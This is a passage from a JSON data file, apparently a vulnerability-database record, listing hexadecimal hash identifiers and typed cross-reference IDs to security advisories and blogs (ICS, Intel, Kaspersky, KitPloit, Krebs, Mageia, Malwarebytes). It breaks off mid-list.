"6ADEAF325A5B46B34D6E419B67D91A45C9FD7E4F02587AF0F33D5FF933653E27", "6C6D0940826336DDE7832D99EA3E6BDC3CE6950B9638280B5C586B4770666429", "6CB020CE84694787BB12E05DCB6CC95C33681B735ED0D48ED68FF5A99DD1D7A4", "6CC386F9299ECFE5F62C9D0954CED9917B32A3DFEB8BC98C8212D83DD7B53DF6", "6DD517DD7F557A31BB9EF8B8E2970701E7EBF9E1168A77A02C5EFC57A29C1AE3", "6DF2E72D03F9AA8435A0A58D154D82EDF5203309F8C81C42E35CBC71D2A79BDD", "6FBF074F8D8E8E6000FCF6488B84CA43AEFB7DEF10B2CEFF0E7D0AE1140ADA41", "6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1", "7061882A844BC1B159CD9483EEA32DBAF5175CB9800976F7DD1F381723E88538", "7156D43131599F71B03A8F8BDCE4755976A54F82BE32B0AEF105D1E6E781F384", "7295DCCE494A2CA195C0EC2BD4F052B62F3E1B45826D03ABBF986B81F58BDD31", "72E392728BCA627E900CA46B892A2B86465C877D468139416A39573D2D6C73F6", "73781BC7A0CCEF128DBC5E169F177E52BD5AD843F08787EBE0E19CC9088C2FA9", "73EAFB98AF656367DD4CBD6C4D9BDB98FBF39B358F625D93589F37D52771AA8D", "745004E6A8DD36244AE3AE2E238FB3CA9F40B885C5F912CA9FBBD7A9FEE76248", "7473C0056DBBEF7C541ECDFB31E947DC1520282F5E0172B7C965A9DECA661856", "747C7023F8D283A88FE9778F37629C7BF2E2A7E5268A695905F9F28590BF76D3", "7566B2B0BD8AE66EDD74AA6296BA3C094CC3661C2B4C3EADB69127C0EBE5A710", "76FC3815A1052A74CFCD99C9C0F5C1F4FA7C289E70171A7BA16DE2B8E6DA736B", "77486B8B5BB16D0AE922BE517509C1AEDA2019428A2A23BADFAE5682D363F74A", "77C0F01606E7883D65A2981E1E5DAEA1712E790E6D5528DDD17691C666E43D15", "78230A0FDE17E1A4791590999547D790CF1340A3123CA146452B6C92AF70CA24", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "7A1D4AFC62D444E93951F6A46CA35876DD42680BFCB9DD562AE0F80A2C338D67", "7A36E54AFF586A013BFC64E0308098C6070D7FE82FD631B59758E4F661D42586", "7AA351B847C7732E8B7AE01A83A77CC863325C3B53A57FDDE54F4DF8D16D14C1", "7B60DE546B91D3886C995A5DE16291DEDDA95C96FC984BD69B852CF111B4C102", "7CCDD8E65FBE1F2581D0942E2116E4E61FB4753B4D48798C9D2BC8624C94826A", "7CE0B3947D8196985B00E6EB61ED45938560312360058DDC3063CF3D7BE03A81", 
"7CFF760ED43EACB85DD304FEF6EEAD9D89C48ADE6361641E84EF811056B6811F", "7D3ECDDF0FEF31AB10959BE94A3F76C4BE4F6CA1CC52373D0E460C5CA46E24A8", "7DDD006076946810EADC174FC2320565F527D46FFF5270A3D6916BF8993B12F9", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E14B22ECA169752ECE98AF6029993D38DAD48CA63B7F7A2541E649258A2178A", "7E2A7C8E981FCA78A12F6D8992BE35354D42B960D223A90BF210EE5B300BFB9E", "7E4FF868DFA0F4BDAEDFDEB60188A16AB82AC45AB8EB35F1D260229F12C10341", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "800A58A21DE4F630ECEAAA1932A596AE5A4743CB06907F342619D1D7ACD5AB64", "801604295C016952DB2E8049DC0524C86569A636C5BC867E0FB7565B433600F8", "818495FB1C54B71E6C7753464B1C7C2926402C76844055039753A11157B24B81", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "822A5D5DDFBAB14222D402C61CEAC1259D980506DB6102BD80EB619551AE1961", "83188B7337A79BED2EE122E55D4C81A473739295B1921C9346E1F37B317DCD40", "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "838686EA8660AF45865AC08A8AAF01B25ECE89F900D760F085C235BD477978AE", "84B9F968C99F1D06D139A9613E0943A5C824556A856DEFE8DEE64E68329DDB5C", "86B15422FEE58FE9F2F1B22520453D09FFA84C6049446DCE8467C766E3B57967", "870093D07F2D1BC6903F68758BFC9ABE9984CCE5FE2C013D13AC7FB645217C4D", "88119FF28113E384895FADEA63C7ABC2906571B02A874CF9D50260071AD58FB7", "887B058F572F29D81FDE73F26FFA89AE94C5B73C248CDC8EB74C172F09B39B6D", "889513D802A76507558C54C040010996613C8881A261DD9C7C561CA24A30140B", "89170AA222353F9A48D8A118FE03328E07C65970B2FBD60979FC33A65AECC8CB", "893374FE903D82E10726F93A8E126C72248B18315149992024525319951E3097", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "89E699B806727E33E450302956E4D536B906A5F4CF0C0791EBBC25F005461B6D", "8A20ED34CC4EABFD78A0599C47EC735B1923D5C4CE1DF595D753961732461EA4", "8A368F9B7240AEC7A45518B26EE613BFEF287DD9E106138A5AD63F4D494034D6", "8A9E980FE740F4424FB663C857EE84E39154A02964A02540A3A74E4A80F058EE", 
"8B18A583802DE934D0ABAD4E3B44AE36DEAE634549737EEE9B825D44B47BD7DA", "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "8B49BD8B4756373645F1A1DA4BC3E31D1FE7BF1F5A0706A9665EE61D5A4B1419", "8C8A687167096A3D2AA73F94AC7D6F1C43EF830C110ED1F9406D92FAD9FCBA59", "8D4EDC587A369AADC2A4B4B6CA60C94602327216807E8B71042463A2BF381325", "8E3EC3A49910FD61ADB4E5FDC225B58A74D0BA57105F3D9A6F1B3E46361C1307", "8E5EB05CFB883D682B3A2C7D645375420476C4616183B915FE43ADDF8FA697A1", "8F6A844E65558AF61A350206417B63BD70D5B529641691C495C07407B13441B7", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "9052D87C0A77FDE9339BE13D5F9E4733073147348EB17E7CF0F5B741C451ECC3", "90B290F66451E3E462C09788B6756181F62A92A8BAA10F2C4BD52977FD8E1B37", "90BE58D9524F7F6A98C3EE79C93A2EE6A0EA2C0D7E33DC628128C7D1BCFA8619", "924D425FFD71097B50917C124D87FAE558BFB3C7DAEF1BEA09CE12CCD6B264B3", "92A25ACC7CA97D427DA5F098FEAD958217F50C6C07BA13888E0C08A046DD5DA3", "92C22BB80F005566A9B6BC13CEB85433025D25B49B4109FF79DFC90B8A2B7A4A", "932EB6FF0C79CFA010373B06A99AA8906C2B3B3171A0D96A0399EF72EC35ED11", "942A563AC62B9ED7ADC9AAA1A75FE9F97DA036B632DE9ECD7DC3CC1E19EC9A60", "94633A31471B22DF4D1E9508BA6DE360B6D37FAD329018F21926F838DAF45AB4", "96004A5F0BCA499E57604F5222E28642F8BB3CC611C03BA8BD6830BAF6767297", "964A048B00AF3D409A4AA83094E36431FA7631859A2D4595D2F53EE838A705E3", "965AA3643F2C2723C5C9B471B69786B972B6D81B6C917B50EE5BFD6C8447279C", "976356D0F193356D662AC659E8578D3D0CC6C5711EA8A61D28A63CCA919F9900", "980930D95C9061C71E85C435692629E07D952BA870609E55949143F9AA635712", "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "998E998A37AA40076F35ACE20C7E0016E44B1CC4EFB6AE26D0761C68B7C99657", "99D36C5A3B6C3FF496422C3FF600B7D254E5D81D1CC0F9184ECD1F8F03423FCD", "9A1FFC27915FCEB638A5FB6C3316111A4211363FE0EC89A0019FA42A7CB89808", "9A6C0D3F4E9D02D3ABB77CC1F15B5C57FED8926916549AF207B111EC9D3C5B1C", "9B0F66C4EFFAAF9FDB1B504C2B624740D85D778570BFE202D803740E0C99076C", 
"9BBA472DF522BDB11A0F80EDDE168630BF88A9C15518FEE66140BBEE5585001A", "9BFFF73DB09075877DB19A13994A90F7D1CF13A8A5601B84DC0B84F8193E65C1", "9C638946C07968147BC89DE8BAE5211C4767A334F7213E99654F7C02ADD0E910", "9CF440D80F7C3ADDF67027FEB0B656E02CC2277FA267330BADF00CF32A1D4BEF", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9DA9D6C05FE03758B84DC068193CB0E2A82B2F411E24F383722448967D77B355", "9DC92E76D921D2F32AF89C6A9268FA55FE90987B5125CC3C9BFF3634818FDD1F", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "9F34E4D3B1044507E18917B1E2BE1AF6051A228EE5F8F69E5539B48FDFAF3B4D", "9FD1AC6E7F93ABD6198F576C4AC025E8DFA5007533DBD2FE78CC5BE3497FF3D6", "A060C0BC5CF92D0F7B8D81075A33D4E2887EE843B41F417A28EC2BBAB72FCED9", "A15B390D080295157749FA22EBE90BAA7A33E1EC803752A1824ADBE8D7353A10", "A1610C4151E05207C2B70F00002FE2069C48E736E5F65C67864C8C78D8372D2B", "A1680316198638EA55AFA837EE37AE44184E9B8BCA2B9FD668F06E417908DF87", "A1D2EE183CE8C9693B1DCADBA6A6AC4E58CAAD746DE6081E211B0D2080D3C3E4", "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "A264D72AF012C33CABCDEE09605EBB277263FB33567A89DC0831C44257A7E37C", "A2F7E57DAD21E2D5E4DB804EB652C6CD00E5CDF5B0D67125B95F4E269BA69025", "A31AAAB46398C4CA9F3552FA53EB3F0DB8FD1384559E2048B5321E5BB6936FB2", "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "A339910401C1CBEBCD02CB63650E2A2F954071F79CBC8E8EA704AFBB756CF438", "A3AEABE024AE1D8520A5BB495A67D45783D1F2AC4B3F9F3B682E75291FD8E20A", "A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "A4DED06E2C9F4A28ADEF0AA4C6EEFDDF9D1F431EA3CF997F41E7EA22CA7B12B7", "A5803C821BBFCE3CF61C99A5753B13549E824EAC069265D225FFBDF6B568BCDB", "A61564D752A2637A5306DF51328148AB1D1EAAC0735226DD1D9F500C5DAECC37", 
"A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "A8080DF589F1BFC2BF6B98ABD8B92D2C07AAE6F3E14977386069111BB800A09C", "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "A9139EA8D202B9FE20D64E771F1FC89C7E9393774315A6265F9CE70E716E1833", "A986F0D7B51C204D69DD897A085F9CB249B65DF7C839AF92D49287ACDEBDA05D", "A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AAB14D78054A85A0638FC4EFD7F09686429CB02C6B45FF1ECAFA55C27A050635", "AB8881439FA512D752063B5AB323E9C076039DB482070536304B448AE092D8CD", "ABBECC2CF1F809CE932B9130A6788B28E3F6228FC5599EA3FB4CD8372D7EA7C8", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "AC579EF06A63C7679B2D7EC4B67819D5F33EC90E9760AA522990209580D45436", "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "AE2FA11123F866B1C71B66A57712F1082B82D3EB4221232EC14E14446822A705", "AE98DBCCCCED8FE9C2F0A9A3294999AEF099215A25C0EDDDFD95DF899965A340", "AF14D81F9945B81EA39B6923FB2CB4E62949A34EE9CCFEF7120D6D6700FA48A1", "AF42048553DF8336CE8F75C6563D3BB870B0BFCC07DC4C6744F964C990F06384", "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "AFFC971A929ABC4A5177F4FBA7D32B82C0ACBC71AEFBBD3E440D08B12B022B51", "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "B1EA708CCF72B8264EA46A7D99E1616E7334C67D440D87A4F97B2B4087696EFD", "B30C006BF323BCAF8E8EF0489319D47B3A0FB0928442F9EB350A3520109F9F72", "B39F7DFF040AEE7948452F4B23B147EBA3BC088DA5624E4E7B049C051EB56B60", "B431011ABF67E8DD4F4E3E4C9F9FD0B1E6E07733191BA7206314070644F2CAF0", "B4779B52313D85FE1157604480F675A0E2BA765BB08DE9BEA2664A6C3AD0F47B", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", 
"B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BA4F5153F7218CA2919C447302324B583F37CF0D794B41E34C5B63CF577C6462", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C2D7FDE6929D1789B9A1618D087E5DCB3FC2780B2EC1CA3CFF40FDF3AD014A8E", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C4B2A7F25639B468CB0778EA1E561F435356D460FB4D417EEBDD1C83186B56CD", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C786E96DD673C5766A45B6750BE6B879F3CF37718ACD79668ADC1130AF26E274", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", 
"CA643463AA3DD27CF347651D7B084BEA39601B3E21A99AD0FE90A4163037F126", "CB1A96B060B639265D7CCD4E0C186EA367A7C82E1756FDF32E57D9F350AD3873", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCE74B609685420B52F0CE6D14ACF26F43DB5C6A64A19034DCD1E9CB0CA2BE72", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE291DB15FB1A7FDE49870DEF70725290D757902B5EB4009CD8DC9710150329D", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D0F2649F94806F3BD8B6996A413257C3454A5FF5033B50B88A71C9C124BF3BDA", "D156BD5A77A183961676EA2393F58C31A72725CEC216EB199E31487998BE491C", "D1B56895A302CB106810B80548010A8993C467A6D8B6EA61EB430703400A5ED8", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D406490E70A52CFB0315F27FCD957BFAE7E7B2887A6C73BE83E3F514F1153348", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9425756DF631BB7CA03B3451BD1F9C557325B8A2BB0CD34A22102962A0F4213", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "D9D956C60F66CFAE1D9189841B4A3D7D9E24B0A79B088C79120CBB100E34A220", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", 
"DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DD0EE895B8C1D023C4A9C7DA2726D4CAC8D1495A05DF9FE91915F58FF012245D", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DEAB63B690E03D8E8203ACA19836C2D36A8ED9D5C66A32CCF4F7F6B6C9F8DE84", "DF1F3615A0C3950BF1BCF7F7E12370C0F3A7DBD2E12D656DC66F966233BD6A40", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2AA9B11D88890FE4ED3C245CC3A519ACAAD11F11F032D2AE032FE428B8C4012", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E3F560319C0EA06228FA2D0D5412CFFD95B8D0963A65CBAC4B6D424BA4B7B434", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E4DC5C75AB8DC1EFE3474E65C33B8EED76C2B358258DE3E2C7A0C0EA9FD53126", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E805A2E822F9F587AC809C6A8CA399694FA0BD883078F64EF001D4B79132B879", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "E8BA6A75873A4594BE92FFE48C361848E9581DAA153EABDC1D071E1A59172338", "EA3F9619545419A098A554C6AA49233D406E118A8A2221EEFF0BABB483AAC02B", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", 
"EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EE31BACFE4E2531B3AC2273027A23C49C59978284694658A79B4BC6797F86ACB", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F02EA1DD204629897DA1861F147A272B72A3FA34A5315D58B896A636EAE341F5", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F203AF8FB4A9FED8F009C8BF5E3F7D7714130DCBC84CDBF1BE1C83E438B18982", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F2719E2760E07B98F3971587EEE2002655F8B8F5281074DED92EF416C43F19C8", "F2901ADEFFDC496A6F27CBD82624C55C4B805D9C77EBED14A24ED2CCC730C354", "F2C60EF9E96AA9B7F20810A32ABE6C58279506718A61C2BD9D6A6DF787CD9EA7", "F35EB0C55F08CA4C671A4E6D2454A08936C6D1CD868709D0EE04FB71FFC263C1", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F532C527613357C6A2A49FB79425351FAA7200585028A4FA9898C13802895FB6", "F7232359E6413A274B62C22CB7BF1EF8C428ADFBF22EF7B9B913D63D087BCACB", 
"F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FB294BF49176D6C142EF1CFE519D56E0B6967174C95D88BDD800F026AD0FBE3B", "FBA658AB7258D6E577137D42B1A2D234254671E3792A2242E92F22B44483BD23", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FCA762BB9E14A08E1A746C9884B2B094D081A955F4AED9FE69DA524978C45CE9", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["ICSA-21-357-02", "ICSA-22-034-01", "ICSMA-18-058-02"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA10995", "KLA11024", "KLA11059", "KLA11139", "KLA11170", "KLA11835", "KLA12277", "KLA12278", "KLA12390", "KLA12391", "KLA12392", "KLA12393", "KLA12394", "KLA12395", "KLA12396", "KLA12442", "KLA12549", "KLA12550", "KLA12578", "KLA12579", "KLA12580", "KLA12581", "KLA12587", "KLA12601", "KLA12602", "KLA12603", "KLA15734", "KLA15736", "KLA19245", 
"KLA19249", "KLA19264"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1624142243530526923", "KITPLOIT:1680589374755422772", "KITPLOIT:2590785192528609562", "KITPLOIT:3188944951765917430", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:3773942873037113539", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:5187040326820919368", "KITPLOIT:522409803487164759", "KITPLOIT:5230148353750207837", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:698315176468431184", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:866017936175971203", "KITPLOIT:8945091038325456871", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2752861A306F74170D69FBD9E0DC3AAB", "KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC", "KREBS:4D5B2D5FA1A6E077B46D7F3051319E72", "KREBS:4F19DF7091060B198B092ABE2F7E1AA8", "KREBS:6E25B247DFBFC9267C00F36CE0695768", "KREBS:93C313996DC56B0E237DCF999BF438CB", "KREBS:E877FCDD28FB558BB4B6AFF240F30EA8", "KREBS:E910A9996E07E6C63E0C32D6520D0F25"]}, {"type": "mageia", "idList": ["MGASA-2021-0556", "MGASA-2021-0566", "MGASA-2021-0572", "MGASA-2022-0002", "MGASA-2022-0277", "MGASA-2022-0287", "MGASA-2022-0309", "MGASA-2022-0315", "MGASA-2022-0318"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0647495F01C9F1847B118A9E32BC6C13", "MALWAREBYTES:08FDD3DEF41B63F1DEB23C21DCFDB12D", "MALWAREBYTES:16440CAA6CF5418D984950D297C8549D", "MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", 
"MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:1E762A45A948B3FD9F8A8DC65D028095", "MALWAREBYTES:2D17A77CBCBBFFE150012C3B71E53FC6", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:3350250AEB75AAF452630CE0B7306455", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:4690DE85CA58136434BF7E127237802F", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:69B09CC9DBBA58546698D97B0C4BAAF0", "MALWAREBYTES:6AC81D4001C847401760BE111E21585B", "MALWAREBYTES:6E72426C60EECBEF071E305072060892", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:775442060A0795887FAB657C06773723", 